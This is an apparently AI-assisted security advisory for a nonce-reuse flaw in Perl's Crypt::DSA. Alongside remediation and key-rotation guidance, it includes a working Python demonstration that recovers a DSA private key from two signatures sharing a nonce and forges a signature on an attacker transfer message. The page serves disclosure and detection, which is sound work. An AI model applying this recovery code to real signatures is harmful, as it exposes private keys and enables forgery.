GHSA-88g7-87jg-w4q9
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Rationale given for this rating: network-observable signatures enable unauthenticated key recovery (AV:N, PR:N, UI:N); the rationale argues for AC:H, because the attacker must collect multiple signatures and perform cryptanalytic computation, even though the vector listed above uses AC:L; full C/I impact because the private key is exposed and arbitrary signatures can then be forged.
Primary rating from Vendor (CNA).
CVSS Vector (Vendor)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Description (PRE-NVD)
Analysis (AI)
Private-key recovery is possible in Crypt::DSA for Perl (all versions before 1.21) because the module caches the per-signature DSA nonce (k) inside the Key object and never clears it, so every call to sign() after the first reuses the identical nonce. Because r = (g^k mod p) mod q depends only on k, all such signatures share the same r value. Any attacker who can observe two or more DSA signatures produced by the same Key object can apply the well-known two-signature algebra (solve for k from the difference of the s values, then for the private key x from either signature) to recover the private key entirely, after which they can forge arbitrary signatures. …
Attack Chain (AI-derived)
Hypothetical attack flow derived from CVE metadata
Vulnerability Assessment (AI)
| Topic | Assessment |
|---|---|
| Exploitation | Exploitation requires that a Crypt::DSA Key object be used to call sign() at least twice within the same process lifetime without being reconstructed between calls; this is the condition that triggers nonce reuse and produces two signatures with identical r values. … |
| Risk Assessment | No NVD-assigned CVSS vector is available, so risk signals are limited to the advisory text, the CWE classification, and the independent metric assessment. … |
| Exploit Scenario | An attacker monitors the DSA-signed outputs of a Perl application that uses Crypt::DSA, for example signed API responses, signed software packages, or authentication tokens. After collecting any two signatures produced by the same Key object (identifiable by their matching r values), the attacker applies the standard two-signature nonce-recovery formula to derive the private key algebraically in milliseconds. … |
| Remediation | Vendor-released patch: Crypt-DSA 1.21, available on CPAN and documented in the changelog at https://metacpan.org/release/TIMLEGGE/Crypt-DSA-1.21/changes. … |
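The two-signature key recovery that the Description and the Exploit Scenario above refer to, as an added worked example. This is not Crypt::DSA code and uses none of its API: it is a self-contained toy DSA in Python with a small group (q = 2^31-1, p found by search), SHA-256 reduced mod q as the hash rule, constructed sample messages, and hypothetical helper names (toy_params, sign, verify, recover_private_key, find_reused_r). The Crypt::DSA defect is modelled by passing the same k to sign() twice, which is exactly what a cached, never-cleared nonce does.

```python
# Added example, not Crypt::DSA code: a toy DSA showing how two signatures that share
# a nonce k leak the private key, plus a check for repeated r in a signature corpus.
import hashlib
import secrets

def is_probable_prime(n: int) -> bool:
    """Deterministic Miller-Rabin; exact for n < 3.4e14, which covers the toy p."""
    if n < 2 or n % 2 == 0:
        return n == 2
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for a in (b for b in (2, 3, 5, 7, 11, 13, 17) if b % n):
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def toy_params():
    """Return (p, q, g): q prime, q | p-1, g of order q (toy sizes only)."""
    q = 2**31 - 1                                  # Mersenne prime M31
    m = 2
    while not is_probable_prime(q * m + 1):
        m += 2
    p = q * m + 1
    h, g = 2, 1
    while g == 1:
        g, h = pow(h, (p - 1) // q, p), h + 1
    return p, q, g

def hash_to_int(msg: bytes, q: int) -> int:
    # Real DSA takes the leftmost len(q) digest bits; mod q is equivalent for this demo.
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % q

def sign(params, x: int, msg: bytes, k: int):
    """DSA signing with a caller-supplied k so the demo can reuse it on purpose."""
    p, q, g = params
    r = pow(g, k, p) % q                           # r depends on k only
    s = pow(k, -1, q) * (hash_to_int(msg, q) + x * r) % q
    if r == 0 or s == 0:                           # real code retries with a new k
        raise ValueError("degenerate signature")
    return r, s

def verify(params, y: int, msg: bytes, sig) -> bool:
    p, q, g = params
    r, s = sig
    if not (0 < r < q and 0 < s < q):
        return False
    w = pow(s, -1, q)
    u1, u2 = hash_to_int(msg, q) * w % q, r * w % q
    return pow(g, u1, p) * pow(y, u2, p) % p % q == r

def recover_private_key(params, msg1, sig1, msg2, sig2) -> int:
    """Two signatures with one k share r; then (mod q) s1 - s2 = k^-1 (h1 - h2),
    so k = (h1 - h2)/(s1 - s2) and, from s1 = k^-1 (h1 + x r), x = (s1 k - h1)/r."""
    _, q, _ = params
    (r1, s1), (r2, s2) = sig1, sig2
    if r1 != r2:
        raise ValueError("different r: the nonce was not reused")
    if (s1 - s2) % q == 0:
        raise ValueError("h1 == h2 mod q: need two distinct message hashes")
    h1, h2 = hash_to_int(msg1, q), hash_to_int(msg2, q)
    k = (h1 - h2) * pow((s1 - s2) % q, -1, q) % q
    return (s1 * k - h1) * pow(r1, -1, q) % q

def find_reused_r(signatures):
    """Detection check: {r: [indices]} for every r that appears more than once."""
    seen = {}
    for i, (r, _) in enumerate(signatures):
        seen.setdefault(r, []).append(i)
    return {r: idx for r, idx in seen.items() if len(idx) > 1}

def demo():
    """Model the Crypt::DSA bug: one Key object signs twice with a cached k."""
    params = p, q, g = toy_params()
    x = secrets.randbelow(q - 1) + 1               # victim's private key
    y = pow(g, x, p)                               # public key
    k_cached = secrets.randbelow(q - 1) + 1        # cached in the Key object, never cleared
    m1 = b"constructed msg 1: GET /api/balance"    # constructed sample inputs
    m2 = b"constructed msg 2: POST /api/transfer"
    sig1 = sign(params, x, m1, k_cached)
    sig2 = sign(params, x, m2, k_cached)           # second sign(): same k, same r
    sig3 = sign(params, x, b"constructed msg 3", secrets.randbelow(q - 1) + 1)
    reused = find_reused_r([sig1, sig3, sig2])     # attacker spots the pair by r
    x_rec = recover_private_key(params, m1, sig1, m2, sig2)
    forged_msg = b"constructed forgery: POST /api/transfer?to=attacker"
    forged = sign(params, x_rec, forged_msg, secrets.randbelow(q - 1) + 1)
    return {"reused": reused, "recovered": x_rec == x,
            "forgery_verifies": verify(params, y, forged_msg, forged)}

if __name__ == "__main__":
    print(demo())
```

Run it and `recovered` and `forgery_verifies` come back true on every run, with `reused` pointing at the two signatures that share r. Parameter size changes nothing: the same three modular operations recover x from a 3072-bit DSA key. The only edge case is two messages whose hashes coincide mod q, which makes s1 equal to s2 and leaves k undetermined; recover_private_key refuses that pair, and any third signature from the same Key object resolves it. When hunting for affected keys in a captured corpus, group signatures by r as find_reused_r does; a repeated r from one signer is the whole detection signal.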
Recommended Action (AI)
Within 24 hours: Identify all systems using Crypt::DSA and determine which signing keys have produced more than one signature from a single Key object on an unpatched version. Treat those keys as recoverable by anyone who observed the signatures and rotate them; upgrading to 1.21 stops further nonce reuse but does not undo a past exposure. …
Same weakness: CWE-323 – Reusing a Nonce, Key Pair in Encryption
Same technique: Information Disclosure
EUVD-2026-37016